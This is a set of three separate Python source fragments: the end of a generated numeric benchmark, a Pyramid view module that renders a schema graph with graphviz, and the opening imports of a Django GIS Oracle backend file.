return_numpy_array[194] = input_numpy_array[27] / math.sqrt(input_numpy_array[54])
return_numpy_array[195] = input_numpy_array[81] / math.sqrt(input_numpy_array[27])
return_numpy_array[196] = input_numpy_array[99] / math.sqrt(input_numpy_array[34])
return_numpy_array[197] = input_numpy_array[86] / math.sqrt(input_numpy_array[96])
return_numpy_array[198] = input_numpy_array[1] / math.sqrt(input_numpy_array[77])
return_numpy_array[199] = input_numpy_array[32] / math.sqrt(input_numpy_array[71])
return_numpy_array[200] = input_numpy_array[31] / math.sqrt(input_numpy_array[59])
return_numpy_array[201] = input_numpy_array[22] / math.sqrt(input_numpy_array[90])
return_numpy_array[202] = input_numpy_array[47] / math.sqrt(input_numpy_array[90])
return_numpy_array[203] = input_numpy_array[22] / math.sqrt(input_numpy_array[78])
return_numpy_array[204] = input_numpy_array[69] / math.sqrt(input_numpy_array[59])
return_numpy_array[205] = input_numpy_array[55] / math.sqrt(input_numpy_array[2])
return_numpy_array[206] = input_numpy_array[38] / math.sqrt(input_numpy_array[40])
return_numpy_array[207] = input_numpy_array[85] / math.sqrt(input_numpy_array[57])
return_numpy_array[208] = input_numpy_array[91] / math.sqrt(input_numpy_array[49])
return_numpy_array[209] = input_numpy_array[81] / math.sqrt(input_numpy_array[19])
return_numpy_array[210] = input_numpy_array[91] / math.sqrt(input_numpy_array[53])
return_numpy_array[211] = input_numpy_array[90] / math.sqrt(input_numpy_array[38])
return_numpy_array[212] = input_numpy_array[87] / math.sqrt(input_numpy_array[18])
return_numpy_array[213] = input_numpy_array[75] / math.sqrt(input_numpy_array[29])
return_numpy_array[214] = input_numpy_array[57] / math.sqrt(input_numpy_array[52])
return_numpy_array[215] = input_numpy_array[84] / math.sqrt(input_numpy_array[40])
return_numpy_array[216] = input_numpy_array[63] / math.sqrt(input_numpy_array[12])
return_numpy_array[217] = input_numpy_array[10] / math.sqrt(input_numpy_array[50])
return_numpy_array[218] = input_numpy_array[70] / math.sqrt(input_numpy_array[12])
return_numpy_array[219] = input_numpy_array[78] / math.sqrt(input_numpy_array[1])
return_numpy_array[220] = input_numpy_array[84] / math.sqrt(input_numpy_array[13])
return_numpy_array[221] = input_numpy_array[92] / math.sqrt(input_numpy_array[58])
return_numpy_array[222] = input_numpy_array[36] / math.sqrt(input_numpy_array[99])
return_numpy_array[223] = input_numpy_array[2] / math.sqrt(input_numpy_array[50])
return_numpy_array[224] = input_numpy_array[64] / math.sqrt(input_numpy_array[63])
return_numpy_array[225] = input_numpy_array[52] / math.sqrt(input_numpy_array[97])
return_numpy_array[226] = input_numpy_array[50] / math.sqrt(input_numpy_array[82])
return_numpy_array[227] = input_numpy_array[68] / math.sqrt(input_numpy_array[26])
return_numpy_array[228] = input_numpy_array[40] / math.sqrt(input_numpy_array[69])
return_numpy_array[229] = input_numpy_array[89] / math.sqrt(input_numpy_array[71])
return_numpy_array[230] = input_numpy_array[66] / math.sqrt(input_numpy_array[96])
return_numpy_array[231] = input_numpy_array[95] / math.sqrt(input_numpy_array[24])
return_numpy_array[232] = input_numpy_array[41] / math.sqrt(input_numpy_array[20])
return_numpy_array[233] = input_numpy_array[13] / math.sqrt(input_numpy_array[3])
return_numpy_array[234] = input_numpy_array[30] / math.sqrt(input_numpy_array[57])
return_numpy_array[235] = input_numpy_array[42] / math.sqrt(input_numpy_array[86])
return_numpy_array[236] = input_numpy_array[7] / math.sqrt(input_numpy_array[31])
return_numpy_array[237] = input_numpy_array[55] / math.sqrt(input_numpy_array[19])
return_numpy_array[238] = input_numpy_array[82] / math.sqrt(input_numpy_array[18])
return_numpy_array[239] = input_numpy_array[75] / math.sqrt(input_numpy_array[50])
return_numpy_array[240] = input_numpy_array[14] / math.sqrt(input_numpy_array[58])
return_numpy_array[241] = input_numpy_array[32] / math.sqrt(input_numpy_array[51])
return_numpy_array[242] = input_numpy_array[68] / math.sqrt(input_numpy_array[80])
return_numpy_array[243] = input_numpy_array[11] / math.sqrt(input_numpy_array[53])
return_numpy_array[244] = input_numpy_array[47] / math.sqrt(input_numpy_array[1])
return_numpy_array[245] = input_numpy_array[6] / math.sqrt(input_numpy_array[9])
return_numpy_array[246] = input_numpy_array[25] / math.sqrt(input_numpy_array[75])
return_numpy_array[247] = input_numpy_array[5] / math.sqrt(input_numpy_array[73])
return_numpy_array[248] = input_numpy_array[47] / math.sqrt(input_numpy_array[79])
return_numpy_array[249] = input_numpy_array[73] / math.sqrt(input_numpy_array[4])
return_numpy_array[250] = input_numpy_array[51] / math.sqrt(input_numpy_array[40])
return_numpy_array[251] = input_numpy_array[75] / math.sqrt(input_numpy_array[63])
return_numpy_array[252] = input_numpy_array[68] / math.sqrt(input_numpy_array[61])
return_numpy_array[253] = input_numpy_array[5] / math.sqrt(input_numpy_array[76])
return_numpy_array[254] = input_numpy_array[97] / math.sqrt(input_numpy_array[45])
return_numpy_array[255] = input_numpy_array[34] / math.sqrt(input_numpy_array[60])
return_numpy_array[256] = input_numpy_array[42] / math.sqrt(input_numpy_array[55])
return_numpy_array[257] = input_numpy_array[37] / math.sqrt(input_numpy_array[47])
return_numpy_array[258] = input_numpy_array[19] / math.sqrt(input_numpy_array[79])
return_numpy_array[259] = input_numpy_array[8] / math.sqrt(input_numpy_array[14])
return_numpy_array[260] = input_numpy_array[5] / math.sqrt(input_numpy_array[83])
return_numpy_array[261] = input_numpy_array[92] / math.sqrt(input_numpy_array[38])
return_numpy_array[262] = input_numpy_array[94] / math.sqrt(input_numpy_array[13])
return_numpy_array[263] = input_numpy_array[30] / math.sqrt(input_numpy_array[39])
return_numpy_array[264] = input_numpy_array[18] / math.sqrt(input_numpy_array[11])
return_numpy_array[265] = input_numpy_array[91] / math.sqrt(input_numpy_array[36])
return_numpy_array[266] = input_numpy_array[23] / math.sqrt(input_numpy_array[57])
return_numpy_array[267] = input_numpy_array[79] / math.sqrt(input_numpy_array[29])
return_numpy_array[268] = input_numpy_array[44] / math.sqrt(input_numpy_array[87])
return_numpy_array[269] = input_numpy_array[10] / math.sqrt(input_numpy_array[71])
return_numpy_array[270] = input_numpy_array[85] / math.sqrt(input_numpy_array[60])
return_numpy_array[271] = input_numpy_array[29] / math.sqrt(input_numpy_array[82])
return_numpy_array[272] = input_numpy_array[17] / math.sqrt(input_numpy_array[44])
return_numpy_array[273] = input_numpy_array[27] / math.sqrt(input_numpy_array[40])
return_numpy_array[274] = input_numpy_array[60] / math.sqrt(input_numpy_array[57])
return_numpy_array[275] = input_numpy_array[32] / math.sqrt(input_numpy_array[55])
return_numpy_array[276] = input_numpy_array[32] / math.sqrt(input_numpy_array[2])
return_numpy_array[277] = input_numpy_array[22] / math.sqrt(input_numpy_array[41])
return_numpy_array[278] = input_numpy_array[45] / math.sqrt(input_numpy_array[57])
return_numpy_array[279] = input_numpy_array[58] / math.sqrt(input_numpy_array[10])
return_numpy_array[280] = input_numpy_array[5] / math.sqrt(input_numpy_array[11])
return_numpy_array[281] = input_numpy_array[49] / math.sqrt(input_numpy_array[53])
return_numpy_array[282] = input_numpy_array[26] / math.sqrt(input_numpy_array[67])
return_numpy_array[283] = input_numpy_array[16] / math.sqrt(input_numpy_array[40])
return_numpy_array[284] = input_numpy_array[80] / math.sqrt(input_numpy_array[45])
return_numpy_array[285] = input_numpy_array[7] / math.sqrt(input_numpy_array[87])
return_numpy_array[286] = input_numpy_array[20] / math.sqrt(input_numpy_array[22])
return_numpy_array[287] = input_numpy_array[97] / math.sqrt(input_numpy_array[31])
return_numpy_array[288] = input_numpy_array[27] / math.sqrt(input_numpy_array[63])
return_numpy_array[289] = input_numpy_array[75] / math.sqrt(input_numpy_array[41])
return_numpy_array[290] = input_numpy_array[72] / math.sqrt(input_numpy_array[31])
return_numpy_array[291] = input_numpy_array[65] / math.sqrt(input_numpy_array[44])
return_numpy_array[292] = input_numpy_array[21] / math.sqrt(input_numpy_array[81])
return_numpy_array[293] = input_numpy_array[51] / math.sqrt(input_numpy_array[22])
return_numpy_array[294] = input_numpy_array[79] / math.sqrt(input_numpy_array[62])
return_numpy_array[295] = input_numpy_array[56] / math.sqrt(input_numpy_array[75])
return_numpy_array[296] = input_numpy_array[84] / math.sqrt(input_numpy_array[68])
return_numpy_array[297] = input_numpy_array[87] / math.sqrt(input_numpy_array[98])
return_numpy_array[298] = input_numpy_array[12] / math.sqrt(input_numpy_array[12])
return_numpy_array[299] = input_numpy_array[35] / math.sqrt(input_numpy_array[45])
return_numpy_array[300] = input_numpy_array[16] / math.sqrt(input_numpy_array[10])
return_numpy_array[301] = input_numpy_array[44] / math.sqrt(input_numpy_array[7])
return_numpy_array[302] = input_numpy_array[97] / math.sqrt(input_numpy_array[64])
return_numpy_array[303] = input_numpy_array[54] / math.sqrt(input_numpy_array[5])
return_numpy_array[304] = input_numpy_array[32] / math.sqrt(input_numpy_array[37])
return_numpy_array[305] = input_numpy_array[3] / math.sqrt(input_numpy_array[38])
return_numpy_array[306] = input_numpy_array[77] / math.sqrt(input_numpy_array[34])
return_numpy_array[307] = input_numpy_array[33] / math.sqrt(input_numpy_array[16])
return_numpy_array[308] = input_numpy_array[34] / math.sqrt(input_numpy_array[33])
return_numpy_array[309] = input_numpy_array[23] / math.sqrt(input_numpy_array[48])
return_numpy_array[310] = input_numpy_array[44] / math.sqrt(input_numpy_array[9])
return_numpy_array[311] = input_numpy_array[11] / math.sqrt(input_numpy_array[27])
return_numpy_array[312] = input_numpy_array[73] / math.sqrt(input_numpy_array[99])
return_numpy_array[313] = input_numpy_array[62] / math.sqrt(input_numpy_array[8])
return_numpy_array[314] = input_numpy_array[85] / math.sqrt(input_numpy_array[33])
return_numpy_array[315] = input_numpy_array[92] / math.sqrt(input_numpy_array[19])
return_numpy_array[316] = input_numpy_array[80] / math.sqrt(input_numpy_array[72])
return_numpy_array[317] = input_numpy_array[85] / math.sqrt(input_numpy_array[88])
return_numpy_array[318] = input_numpy_array[89] / math.sqrt(input_numpy_array[12])
return_numpy_array[319] = input_numpy_array[19] / math.sqrt(input_numpy_array[73])
return_numpy_array[320] = input_numpy_array[66] / math.sqrt(input_numpy_array[22])
return_numpy_array[321] = input_numpy_array[79] / math.sqrt(input_numpy_array[1])
return_numpy_array[322] = input_numpy_array[56] / math.sqrt(input_numpy_array[23])
return_numpy_array[323] = input_numpy_array[71] / math.sqrt(input_numpy_array[37])
return_numpy_array[324] = input_numpy_array[64] / math.sqrt(input_numpy_array[98])
return_numpy_array[325] = input_numpy_array[79] / math.sqrt(input_numpy_array[39])
return_numpy_array[326] = input_numpy_array[52] / math.sqrt(input_numpy_array[37])
return_numpy_array[327] = input_numpy_array[33] / math.sqrt(input_numpy_array[11])
return_numpy_array[328] = input_numpy_array[85] / math.sqrt(input_numpy_array[57])
return_numpy_array[329] = input_numpy_array[48] / math.sqrt(input_numpy_array[34])
return_numpy_array[330] = input_numpy_array[97] / math.sqrt(input_numpy_array[63])
return_numpy_array[331] = input_numpy_array[54] / math.sqrt(input_numpy_array[39])
return_numpy_array[332] = input_numpy_array[3] / math.sqrt(input_numpy_array[61])
return_numpy_array[333] = input_numpy_array[13] / math.sqrt(input_numpy_array[100])
return_numpy_array[334] = input_numpy_array[31] / math.sqrt(input_numpy_array[94])
return_numpy_array[335] = input_numpy_array[73] / math.sqrt(input_numpy_array[35])
return_numpy_array[336] = input_numpy_array[91] / math.sqrt(input_numpy_array[36])
return_numpy_array[337] = input_numpy_array[84] / math.sqrt(input_numpy_array[67])
return_numpy_array[338] = input_numpy_array[87] / math.sqrt(input_numpy_array[84])
return_numpy_array[339] = input_numpy_array[21] / math.sqrt(input_numpy_array[50])
return_numpy_array[340] = input_numpy_array[33] / math.sqrt(input_numpy_array[88])
return_numpy_array[341] = input_numpy_array[89] / math.sqrt(input_numpy_array[3])
return_numpy_array[342] = input_numpy_array[43] / math.sqrt(input_numpy_array[33])
return_numpy_array[343] = input_numpy_array[37] / math.sqrt(input_numpy_array[15])
return_numpy_array[344] = input_numpy_array[0] / math.sqrt(input_numpy_array[77])
return_numpy_array[345] = input_numpy_array[18] / math.sqrt(input_numpy_array[37])
return_numpy_array[346] = input_numpy_array[99] / math.sqrt(input_numpy_array[13])
return_numpy_array[347] = input_numpy_array[90] / math.sqrt(input_numpy_array[14])
return_numpy_array[348] = input_numpy_array[88] / math.sqrt(input_numpy_array[62])
return_numpy_array[349] = input_numpy_array[1] / math.sqrt(input_numpy_array[35])
return_numpy_array[350] = input_numpy_array[79] / math.sqrt(input_numpy_array[10])
return_numpy_array[351] = input_numpy_array[60] / math.sqrt(input_numpy_array[63])
return_numpy_array[352] = input_numpy_array[65] / math.sqrt(input_numpy_array[12])
return_numpy_array[353] = input_numpy_array[35] / math.sqrt(input_numpy_array[69])
return_numpy_array[354] = input_numpy_array[46] / math.sqrt(input_numpy_array[30])
return_numpy_array[355] = input_numpy_array[54] / math.sqrt(input_numpy_array[13])
return_numpy_array[356] = input_numpy_array[87] / math.sqrt(input_numpy_array[64])
return_numpy_array[357] = input_numpy_array[74] / math.sqrt(input_numpy_array[91])
return_numpy_array[358] = input_numpy_array[78] / math.sqrt(input_numpy_array[95])
return_numpy_array[359] = input_numpy_array[46] / math.sqrt(input_numpy_array[39])
return_numpy_array[360] = input_numpy_array[55] / math.sqrt(input_numpy_array[31])
return_numpy_array[361] = input_numpy_array[81] / math.sqrt(input_numpy_array[87])
return_numpy_array[362] = input_numpy_array[42] / math.sqrt(input_numpy_array[93])
return_numpy_array[363] = input_numpy_array[66] / math.sqrt(input_numpy_array[67])
return_numpy_array[364] = input_numpy_array[52] / math.sqrt(input_numpy_array[30])
return_numpy_array[365] = input_numpy_array[56] / math.sqrt(input_numpy_array[53])
return_numpy_array[366] = input_numpy_array[85] / math.sqrt(input_numpy_array[9])
return_numpy_array[367] = input_numpy_array[31] / math.sqrt(input_numpy_array[59])
return_numpy_array[368] = input_numpy_array[86] / math.sqrt(input_numpy_array[77])
return_numpy_array[369] = input_numpy_array[39] / math.sqrt(input_numpy_array[41])
return_numpy_array[370] = input_numpy_array[35] / math.sqrt(input_numpy_array[39])
return_numpy_array[371] = input_numpy_array[22] / math.sqrt(input_numpy_array[89])
return_numpy_array[372] = input_numpy_array[45] / math.sqrt(input_numpy_array[56])
return_numpy_array[373] = input_numpy_array[7] / math.sqrt(input_numpy_array[42])
return_numpy_array[374] = input_numpy_array[5] / math.sqrt(input_numpy_array[92])
return_numpy_array[375] = input_numpy_array[93] / math.sqrt(input_numpy_array[23])
return_numpy_array[376] = input_numpy_array[21] / math.sqrt(input_numpy_array[83])
return_numpy_array[377] = input_numpy_array[90] / math.sqrt(input_numpy_array[60])
return_numpy_array[378] = input_numpy_array[74] / math.sqrt(input_numpy_array[29])
return_numpy_array[379] = input_numpy_array[40] / math.sqrt(input_numpy_array[9])
return_numpy_array[380] = input_numpy_array[70] / math.sqrt(input_numpy_array[71])
return_numpy_array[381] = input_numpy_array[16] / math.sqrt(input_numpy_array[73])
return_numpy_array[382] = input_numpy_array[61] / math.sqrt(input_numpy_array[100])
return_numpy_array[383] = input_numpy_array[18] / math.sqrt(input_numpy_array[56])
return_numpy_array[384] = input_numpy_array[18] / math.sqrt(input_numpy_array[94])
return_numpy_array[385] = input_numpy_array[41] / math.sqrt(input_numpy_array[43])
return_numpy_array[386] = input_numpy_array[8] / math.sqrt(input_numpy_array[87])
return_numpy_array[387] = input_numpy_array[93] / math.sqrt(input_numpy_array[65])
return_numpy_array[388] = input_numpy_array[31] / math.sqrt(input_numpy_array[75])
return_numpy_array[389] = input_numpy_array[54] / math.sqrt(input_numpy_array[46])
return_numpy_array[390] = input_numpy_array[56] / math.sqrt(input_numpy_array[50])
return_numpy_array[391] = input_numpy_array[68] / math.sqrt(input_numpy_array[92])
return_numpy_array[392] = input_numpy_array[7] / math.sqrt(input_numpy_array[42])
return_numpy_array[393] = input_numpy_array[7] / math.sqrt(input_numpy_array[84])
return_numpy_array[394] = input_numpy_array[46] / math.sqrt(input_numpy_array[50])
return_numpy_array[395] = input_numpy_array[47] / math.sqrt(input_numpy_array[65])
return_numpy_array[396] = input_numpy_array[43] / math.sqrt(input_numpy_array[82])
return_numpy_array[397] = input_numpy_array[46] / math.sqrt(input_numpy_array[32])
return_numpy_array[398] = input_numpy_array[51] / math.sqrt(input_numpy_array[17])
return_numpy_array[399] = input_numpy_array[14] / math.sqrt(input_numpy_array[5])
return_numpy_array[400] = input_numpy_array[17] / math.sqrt(input_numpy_array[33])
return_numpy_array[401] = input_numpy_array[54] / math.sqrt(input_numpy_array[86])
return_numpy_array[402] = input_numpy_array[7] / math.sqrt(input_numpy_array[41])
return_numpy_array[403] = input_numpy_array[59] / math.sqrt(input_numpy_array[16])
return_numpy_array[404] = input_numpy_array[68] / math.sqrt(input_numpy_array[36])
return_numpy_array[405] = input_numpy_array[20] / math.sqrt(input_numpy_array[4])
return_numpy_array[406] = input_numpy_array[43] / math.sqrt(input_numpy_array[64])
return_numpy_array[407] = input_numpy_array[4] / math.sqrt(input_numpy_array[1])
return_numpy_array[408] = input_numpy_array[13] / math.sqrt(input_numpy_array[93])
return_numpy_array[409] = input_numpy_array[65] / math.sqrt(input_numpy_array[50])
return_numpy_array[410] = input_numpy_array[50] / math.sqrt(input_numpy_array[41])
return_numpy_array[411] = input_numpy_array[66] / math.sqrt(input_numpy_array[72])
return_numpy_array[412] = input_numpy_array[17] / math.sqrt(input_numpy_array[10])
return_numpy_array[413] = input_numpy_array[75] / math.sqrt(input_numpy_array[6])
return_numpy_array[414] = input_numpy_array[51] / math.sqrt(input_numpy_array[83])
return_numpy_array[415] = input_numpy_array[46] / math.sqrt(input_numpy_array[17])
return_numpy_array[416] = input_numpy_array[77] / math.sqrt(input_numpy_array[57])
return_numpy_array[417] = input_numpy_array[53] / math.sqrt(input_numpy_array[33])
return_numpy_array[418] = input_numpy_array[47] / math.sqrt(input_numpy_array[39])
return_numpy_array[419] = input_numpy_array[94] / math.sqrt(input_numpy_array[15])
return_numpy_array[420] = input_numpy_array[93] / math.sqrt(input_numpy_array[85])
return_numpy_array[421] = input_numpy_array[73] / math.sqrt(input_numpy_array[94])
return_numpy_array[422] = input_numpy_array[84] / math.sqrt(input_numpy_array[95])
return_numpy_array[423] = input_numpy_array[32] / math.sqrt(input_numpy_array[56])
return_numpy_array[424] = input_numpy_array[17] / math.sqrt(input_numpy_array[90])
return_numpy_array[425] = input_numpy_array[76] / math.sqrt(input_numpy_array[68])
return_numpy_array[426] = input_numpy_array[25] / math.sqrt(input_numpy_array[94])
return_numpy_array[427] = input_numpy_array[64] / math.sqrt(input_numpy_array[29])
return_numpy_array[428] = input_numpy_array[37] / math.sqrt(input_numpy_array[89])
return_numpy_array[429] = input_numpy_array[50] / math.sqrt(input_numpy_array[99])
return_numpy_array[430] = input_numpy_array[40] / math.sqrt(input_numpy_array[78])
return_numpy_array[431] = input_numpy_array[46] / math.sqrt(input_numpy_array[63])
return_numpy_array[432] = input_numpy_array[19] / math.sqrt(input_numpy_array[83])
return_numpy_array[433] = input_numpy_array[49] / math.sqrt(input_numpy_array[42])
return_numpy_array[434] = input_numpy_array[65] / math.sqrt(input_numpy_array[80])
return_numpy_array[435] = input_numpy_array[83] / math.sqrt(input_numpy_array[97])
return_numpy_array[436] = input_numpy_array[93] / math.sqrt(input_numpy_array[17])
return_numpy_array[437] = input_numpy_array[54] / math.sqrt(input_numpy_array[40])
return_numpy_array[438] = input_numpy_array[90] / math.sqrt(input_numpy_array[100])
return_numpy_array[439] = input_numpy_array[18] / math.sqrt(input_numpy_array[35])
return_numpy_array[440] = input_numpy_array[77] / math.sqrt(input_numpy_array[28])
return_numpy_array[441] = input_numpy_array[68] / math.sqrt(input_numpy_array[23])
return_numpy_array[442] = input_numpy_array[63] / math.sqrt(input_numpy_array[47])
return_numpy_array[443] = input_numpy_array[93] / math.sqrt(input_numpy_array[6])
return_numpy_array[444] = input_numpy_array[85] / math.sqrt(input_numpy_array[88])
return_numpy_array[445] = input_numpy_array[100] / math.sqrt(input_numpy_array[60])
return_numpy_array[446] = input_numpy_array[26] / math.sqrt(input_numpy_array[64])
return_numpy_array[447] = input_numpy_array[98] / math.sqrt(input_numpy_array[96])
return_numpy_array[448] = input_numpy_array[29] / math.sqrt(input_numpy_array[75])
return_numpy_array[449] = input_numpy_array[99] / math.sqrt(input_numpy_array[30])
return_numpy_array[450] = input_numpy_array[74] / math.sqrt(input_numpy_array[86])
return_numpy_array[451] = input_numpy_array[69] / math.sqrt(input_numpy_array[11])
return_numpy_array[452] = input_numpy_array[75] / math.sqrt(input_numpy_array[64])
return_numpy_array[453] = input_numpy_array[23] / math.sqrt(input_numpy_array[41])
return_numpy_array[454] = input_numpy_array[49] / math.sqrt(input_numpy_array[3])
return_numpy_array[455] = input_numpy_array[70] / math.sqrt(input_numpy_array[55])
return_numpy_array[456] = input_numpy_array[21] / math.sqrt(input_numpy_array[38])
return_numpy_array[457] = input_numpy_array[65] / math.sqrt(input_numpy_array[81])
return_numpy_array[458] = input_numpy_array[9] / math.sqrt(input_numpy_array[47])
return_numpy_array[459] = input_numpy_array[99] / math.sqrt(input_numpy_array[15])
return_numpy_array[460] = input_numpy_array[61] / math.sqrt(input_numpy_array[85])
return_numpy_array[461] = input_numpy_array[33] / math.sqrt(input_numpy_array[54])
return_numpy_array[462] = input_numpy_array[66] / math.sqrt(input_numpy_array[19])
return_numpy_array[463] = input_numpy_array[50] / math.sqrt(input_numpy_array[39])
return_numpy_array[464] = input_numpy_array[40] / math.sqrt(input_numpy_array[54])
return_numpy_array[465] = input_numpy_array[11] / math.sqrt(input_numpy_array[23])
return_numpy_array[466] = input_numpy_array[24] / math.sqrt(input_numpy_array[22])
return_numpy_array[467] = input_numpy_array[86] / math.sqrt(input_numpy_array[17])
return_numpy_array[468] = input_numpy_array[83] / math.sqrt(input_numpy_array[2])
return_numpy_array[469] = input_numpy_array[44] / math.sqrt(input_numpy_array[69])
return_numpy_array[470] = input_numpy_array[53] / math.sqrt(input_numpy_array[25])
return_numpy_array[471] = input_numpy_array[83] / math.sqrt(input_numpy_array[67])
return_numpy_array[472] = input_numpy_array[3] / math.sqrt(input_numpy_array[42])
return_numpy_array[473] = input_numpy_array[43] / math.sqrt(input_numpy_array[33])
return_numpy_array[474] = input_numpy_array[73] / math.sqrt(input_numpy_array[97])
return_numpy_array[475] = input_numpy_array[39] / math.sqrt(input_numpy_array[20])
return_numpy_array[476] = input_numpy_array[98] / math.sqrt(input_numpy_array[58])
return_numpy_array[477] = input_numpy_array[21] / math.sqrt(input_numpy_array[38])
return_numpy_array[478] = input_numpy_array[88] / math.sqrt(input_numpy_array[47])
return_numpy_array[479] = input_numpy_array[6] / math.sqrt(input_numpy_array[93])
return_numpy_array[480] = input_numpy_array[37] / math.sqrt(input_numpy_array[96])
return_numpy_array[481] = input_numpy_array[23] / math.sqrt(input_numpy_array[60])
return_numpy_array[482] = input_numpy_array[68] / math.sqrt(input_numpy_array[2])
return_numpy_array[483] = input_numpy_array[66] / math.sqrt(input_numpy_array[64])
return_numpy_array[484] = input_numpy_array[49] / math.sqrt(input_numpy_array[26])
return_numpy_array[485] = input_numpy_array[18] / math.sqrt(input_numpy_array[26])
return_numpy_array[486] = input_numpy_array[48] / math.sqrt(input_numpy_array[7])
return_numpy_array[487] = input_numpy_array[89] / math.sqrt(input_numpy_array[94])
return_numpy_array[488] = input_numpy_array[5] / math.sqrt(input_numpy_array[54])
return_numpy_array[489] = input_numpy_array[20] / math.sqrt(input_numpy_array[91])
return_numpy_array[490] = input_numpy_array[86] / math.sqrt(input_numpy_array[35])
return_numpy_array[491] = input_numpy_array[68] / math.sqrt(input_numpy_array[12])
return_numpy_array[492] = input_numpy_array[54] / math.sqrt(input_numpy_array[60])
return_numpy_array[493] = input_numpy_array[35] / math.sqrt(input_numpy_array[45])
return_numpy_array[494] = input_numpy_array[44] / math.sqrt(input_numpy_array[8])
return_numpy_array[495] = input_numpy_array[82] / math.sqrt(input_numpy_array[29])
return_numpy_array[496] = input_numpy_array[39] / math.sqrt(input_numpy_array[43])
return_numpy_array[497] = input_numpy_array[39] / math.sqrt(input_numpy_array[88])
return_numpy_array[498] = input_numpy_array[1] / math.sqrt(input_numpy_array[18])
return_numpy_array[499] = input_numpy_array[73] / math.sqrt(input_numpy_array[71])
return_numpy_array[500] = input_numpy_array[55] / math.sqrt(input_numpy_array[34])
return_numpy_array[501] = input_numpy_array[46] / math.sqrt(input_numpy_array[70])
return_numpy_array[502] = input_numpy_array[33] / math.sqrt(input_numpy_array[48])
return_numpy_array[503] = input_numpy_array[2] / math.sqrt(input_numpy_array[36])
return_numpy_array[504] = input_numpy_array[92] / math.sqrt(input_numpy_array[89])
return_numpy_array[505] = input_numpy_array[47] / math.sqrt(input_numpy_array[67])
return_numpy_array[506] = input_numpy_array[86] / math.sqrt(input_numpy_array[90])
return_numpy_array[507] = input_numpy_array[98] / math.sqrt(input_numpy_array[45])
return_numpy_array[508] = input_numpy_array[91] / math.sqrt(input_numpy_array[53])
return_numpy_array[509] = input_numpy_array[69] / math.sqrt(input_numpy_array[80])
return_numpy_array[510] = input_numpy_array[34] / math.sqrt(input_numpy_array[61])
return_numpy_array[511] = input_numpy_array[20] / math.sqrt(input_numpy_array[49])
return_numpy_array[512] = input_numpy_array[11] / math.sqrt(input_numpy_array[27])
return_numpy_array[513] = input_numpy_array[86] / math.sqrt(input_numpy_array[9])
return_numpy_array[514] = input_numpy_array[8] / math.sqrt(input_numpy_array[99])
return_numpy_array[515] = input_numpy_array[25] / math.sqrt(input_numpy_array[8])
return return_numpy_array
def main():
    """Benchmark process_row() on a synthetic row and print mean seconds/call."""
    row = numpy.ones(101, dtype=numpy.float64)
    iterations = 10000
    row[10] = 5
    row[100] = 6
    row[11] = 8
    # Two warm-up calls so one-time (JIT) compilation cost stays out of the timing.
    process_row(row)
    process_row(row)
    start = timer()
    for _ in range(iterations):
        process_row(row)
    end = timer()
    print((end - start) / iterations)
if __name__ == '__main__':
    main()
|
1689517
|
from collections import defaultdict
from past.builtins import basestring
from pyramid.response import Response
from pyramid.view import view_config
from subprocess import Popen, PIPE
from xml.sax.saxutils import quoteattr, escape
from contentbase import TYPES
def includeme(config):
    """Pyramid hook: register the graph.dot / graph.svg routes and scan this
    module so the @view_config decorated views below are picked up."""
    config.add_route('graph_dot', '/profiles/graph.dot')
    config.add_route('graph_svg', '/profiles/graph.svg')
    config.scan(__name__)
def node(item_type, props):
    """Yield graphviz dot lines rendering *item_type* as an HTML-table node.

    The 'uuid' property and calculated properties are skipped; array
    properties get a ' []' suffix and link properties are bolded.
    """
    header = (
        '{item_type} [shape=plaintext label=<\n'
        ' <table border="1" cellborder="0" cellspacing="0" align="left">\n'
        ' <tr><td PORT="uuid" border="1" sides="B" bgcolor="lavender" href="/profiles/{item_type}.json">{item_type}</td></tr>'
    )
    yield header.format(item_type=item_type)
    for name, prop in sorted(props.items()):
        if name == 'uuid' or prop.get('calculatedProperty'):
            continue
        label = escape(name)
        if 'items' in prop:
            # Array property: annotate the label and descend into the item schema.
            label += ' []'
            prop = prop['items']
        if 'linkTo' in prop:
            label = '<b>' + label + '</b>'
        yield ' <tr><td PORT={name}>{label}</td></tr>'.format(name=quoteattr(name), label=label)
    yield ' </table>>];'
def edges(source, name, linkTo, exclude, subclasses):
    """Return dot edge lines from source:name to every link target.

    A string linkTo naming an abstract base is expanded to its concrete
    subclasses; the source itself and excluded names produce no edges.
    """
    targets = linkTo
    if isinstance(targets, basestring):
        targets = subclasses[targets] if targets in subclasses else [targets]
    skipped = [source] + exclude
    result = []
    for target in targets:
        if target in skipped:
            continue
        result.append('{source}:{name} -> {target}:uuid;'.format(
            source=source, name=quoteattr(name), target=target))
    return result
def digraph(types, exclude=None):
    """Build the full graphviz dot source for the given type registry.

    :param exclude: property names whose edges are omitted; defaults to
        submitted_by/lab/award, which would otherwise link nearly every node.
    """
    exclude = exclude or ['submitted_by', 'lab', 'award']
    out = ['digraph schema {', 'rankdir=LR']
    # Map each abstract base type to the concrete types derived from it.
    subclasses = defaultdict(list)
    for source, type_info in sorted(types.items()):
        for base in type_info.base_types[:-1]:
            subclasses[base].append(source)
    for source, type_info in sorted(types.items()):
        if type_info.schema is None:
            continue
        # Test fixtures and the legacy antibody_approval type are omitted.
        if source.startswith('testing_') or source == 'antibody_approval':
            continue
        out.extend(node(source, type_info.schema['properties']))
        for name, prop in type_info.schema['properties'].items():
            if name in exclude or prop.get('calculatedProperty'):
                continue
            prop = prop.get('items', prop)
            if 'linkTo' in prop:
                out.extend(edges(source, name, prop['linkTo'], exclude, subclasses))
    out.append('}')
    return '\n'.join(out)
@view_config(route_name='graph_dot', request_method='GET')
def schema_dot(request):
    """Serve the schema graph as graphviz dot source.

    'exclude' query parameters (repeatable) suppress edges for those
    property names.
    """
    dot = digraph(request.registry[TYPES].types, request.params.getall('exclude'))
    return Response(dot, content_type='text/vnd.graphviz', charset='utf-8')
@view_config(route_name='graph_svg', request_method='GET')
def schema_svg(request):
    """Serve the schema graph rendered to SVG.

    Pipes the dot source through the graphviz 'dot' binary, which must be
    on the server's PATH.
    """
    dot = digraph(request.registry[TYPES].types, request.params.getall('exclude'))
    p = Popen(['dot', '-Tsvg'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
    # communicate() feeds stdin, drains both pipes and waits for exit.
    svg, err = p.communicate(dot.encode('utf-8'))
    assert p.returncode == 0, err.decode('utf-8')
    return Response(svg, content_type='image/svg+xml', charset='utf-8')
|
1689534
|
from django.db import connection
from django.db.backends.util import truncate_name
from django.db.models.fields import Field # Django base Field class
from django.contrib.gis.db.backend.util import gqn
from django.contrib.gis.db.backend.oracle.query import TRANSFORM
# Quotename & geographic quotename, respectively.
qn = connection.ops.quote_name
